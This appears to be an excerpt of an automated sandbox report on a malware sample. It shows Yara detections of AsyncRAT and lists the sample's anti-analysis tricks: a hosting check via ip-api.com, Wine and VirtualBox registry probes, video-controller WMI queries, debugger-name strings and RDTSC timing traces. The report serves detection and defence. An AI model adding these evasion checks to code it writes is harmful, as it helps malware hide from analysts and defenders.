Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3322775695.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_4-10442
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_5-9948

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: regsvr32.exe, 00000033.00000002.4567679082.00000000004CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: regsvr32.exe, 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: regsvr32.exe, 00000033.00000002.4567679082.00000000004D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXEH
Source: regsvr32.exe, 00000033.00000002.4567679082.00000000004CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXEZ
Source: regsvr32.exe, 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, regsvr32.exe, 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLINFO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 11EAE4 second address: 11EB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8765238CC6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8765238CCBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29688C second address: 2968AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2968AD second address: 2968C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8765238CC6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8765238CCEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 296B31 second address: 296B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8764C3B8C3h 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 296CB3 second address: 296CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 296FDB second address: 296FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 296FDF second address: 297019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F8765238CE0h 0x0000000c jns 00007F8765238CC6h 0x00000012 jmp 00007F8765238CD4h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F8765238CC6h 0x0000001f jmp 00007F8765238CCCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 297019 second address: 29701D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A374 second address: 29A3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ecx, ax 0x0000000c push 00000000h 0x0000000e xor edx, 3AAD814Ah 0x00000014 ja 00007F8765238CCBh 0x0000001a call 00007F8765238CC9h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 je 00007F8765238CC6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A3A8 second address: 29A4C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007F8764C3B8BEh 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F8764C3B8C7h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F8764C3B8BFh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 je 00007F8764C3B8D1h 0x0000002b pushad 0x0000002c jo 00007F8764C3B8B6h 0x00000032 jmp 00007F8764C3B8C3h 0x00000037 popad 0x00000038 pop eax 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F8764C3B8B8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 jmp 00007F8764C3B8C2h 0x00000058 push 00000003h 0x0000005a jnl 00007F8764C3B8CEh 0x00000060 mov edx, dword ptr [ebp+122D2AA5h] 0x00000066 push 00000000h 0x00000068 and dx, 50C4h 0x0000006d push 00000003h 0x0000006f jmp 00007F8764C3B8BCh 0x00000074 call 00007F8764C3B8B9h 0x00000079 jmp 00007F8764C3B8C8h 0x0000007e push eax 0x0000007f jbe 00007F8764C3B8C4h 0x00000085 mov eax, dword ptr [esp+04h] 0x00000089 push eax 0x0000008a push edx 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A4C3 second address: 29A4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A4C8 second address: 29A4F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8764C3B8B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jnp 00007F8764C3B8BAh 0x00000016 push esi 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007F8764C3B8B8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
